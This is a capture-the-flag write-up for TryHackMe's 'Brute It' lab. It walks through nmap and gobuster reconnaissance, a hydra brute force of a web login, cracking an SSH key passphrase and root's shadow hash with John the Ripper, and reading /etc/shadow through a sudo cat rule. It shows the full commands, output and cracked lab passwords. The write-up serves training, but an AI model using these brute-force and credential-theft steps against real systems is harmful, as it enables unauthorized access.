Brute It

Date: 09 November, 2021

Author: Dhaval Kotak

Room: Brute It

Reconnaissance

nanomite @ zeus in ~/thm/brute_it
⚡️ nmap -A 10.10.87.211 | tee nmap.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-09 12:20 IST
Nmap scan report for 10.10.87.211
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:0e:bf:14:fa:54:b3:5c:44:15:ed:b2:5d:a0:ac:8f (RSA)
|   256 d0:3a:81:55:13:5e:87:0c:e8:52:1e:cf:44:e0:3a:54 (ECDSA)
|_  256 da:ce:79:e0:45:eb:17:25:ef:62:ac:98:f0:cf:bb:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.48 seconds

How many ports are open?

2

What version of SSH is running?

OpenSSH 7.6p1

What version of Apache is running?

2.4.29

Which Linux distribution is running?

Ubuntu

Search for hidden directories on web server.

nanomite @ zeus in ~/thm/brute_it
⚡️ gobuster dir -u http://10.10.87.211 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.87.211
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/11/09 12:24:13 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.hta                 (Status: 403) [Size: 277]
/admin                (Status: 301) [Size: 312] [--> http://10.10.87.211/admin/]
/index.html           (Status: 200) [Size: 10918]                               
/server-status        (Status: 403) [Size: 277]                                 
                                                                                
===============================================================
2021/11/09 12:27:18 Finished
===============================================================

What is the hidden directory?

/admin

Getting A Shell

We find the username of SSH in a comment while looking at the page source

<!-- Hey john, if you do not remember, the username is admin -->

Now lets brute force the login page with hydra

nanomite @ zeus in ~/thm/brute_it
⚡️  hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.87.211 http-post-form "/admin/:user=^USER^&pass=^PASS^&Login=Login:Username or password invalid"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-09 12:33:04
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.87.211:80/admin/:user=^USER^&pass=^PASS^&Login=Login:Username or password invalid
[80][http-post-form] host: 10.10.87.211   login: admin   password: xavier
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-09 12:33:42

Explaination :

-l admin : Specifying the username

-P /usr/share/wordlists/rockyou.txt : Specifying the password dictionary

10.10.87.211 : The Target IP

http-post-form : The type of attack protocol

/admin : The directory of the form

user=^USER^&pass=^PASS^ : The login response from the form

Username or password invalid : The login message if the login failed

What is the user:password of the admin panel?

admin:xavier

Crack the RSA key you found.

nanomite @ zeus in ~/thm/brute_it
⚡️ sudo python3 /opt/john/ssh2John.py id_rsa > hash
nanomite @ zeus in ~/thm/brute_it
⚡️ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
rockinroll       (id_rsa)
1g 0:00:00:04 52.40% (ETA: 12:37:06) 0.2487g/s 1888Kp/s 1888Kc/s 1888KC/s hippy3245667
Session aborted

What is John's RSA Private Key passphrase?

rockinroll

User.txt

nanomite @ zeus in ~/thm/brute_it
⚡️ ssh john@10.10.87.211 -i id_rsa 
The authenticity of host '10.10.87.211 (10.10.87.211)' can't be established.
ECDSA key fingerprint is SHA256:6/bVnMDQ46C+aRgroR5KUwqKM6J9jAfSYFMQIOKckug.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.87.211' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-118-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Nov  9 07:09:27 UTC 2021

  System load:  0.0                Processes:           103
  Usage of /:   25.7% of 19.56GB   Users logged in:     0
  Memory usage: 39%                IP address for eth0: 10.10.87.211
  Swap usage:   0%


63 packages can be updated.
0 updates are security updates.


Last login: Wed Sep 30 14:06:18 2020 from 192.168.1.106
john@bruteit:~$ ls
user.txt
john@bruteit:~$ cat user.txt 
THM{REDACTED}

Web flag

You will get the flag when you login with the credentials found by hydra

Privilege Escalation

Find a form to escalate your privileges.

john@bruteit:~$ sudo -l
Matching Defaults entries for john on bruteit:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on bruteit:
    (root) NOPASSWD: /bin/cat

We can use cat as a root user without any password. So lets cat the /etc/shadow file.

john@bruteit:~$ sudo cat /etc/shadow
root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
...
thm:$6$hAlc6HXuBJHNjKzc$NPo/0/iuwh3.86PgaO97jTJJ/hmb0nPj8S/V6lZDsjUeszxFVZvuHsfcirm4zZ11IUqcoB9IEWYiCV.wcuzIZ.:18489:0:99999:7:::
sshd:*:18489:0:99999:7:::
john:$6$iODd0YaH$BA2G28eil/ZUZAV5uNaiNPE0Pa6XHWUFp7uNTp2mooxwa4UzhfC0kjpzPimy1slPNm9r/9soRw8KqrSgfDPfI0:18490:0:99999:7:::

Using john to crack the root hash

nanomite @ zeus in ~/thm/brute_it
⚡️ john root-hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
football         (root)
1g 0:00:00:04 DONE 2/3 (2021-11-09 12:49) 0.2309g/s 711.3p/s 711.3c/s 711.3C/s 123456..john
Use the "--show" option to display all of the cracked passwords reliably
Session completed

What is the root's password?

football

root.txt

root@bruteit:/home/john# cd /root
root@bruteit:~# ls
root.txt
root@bruteit:~# cat root.txt 
THM{REDACTED}
root@bruteit:~#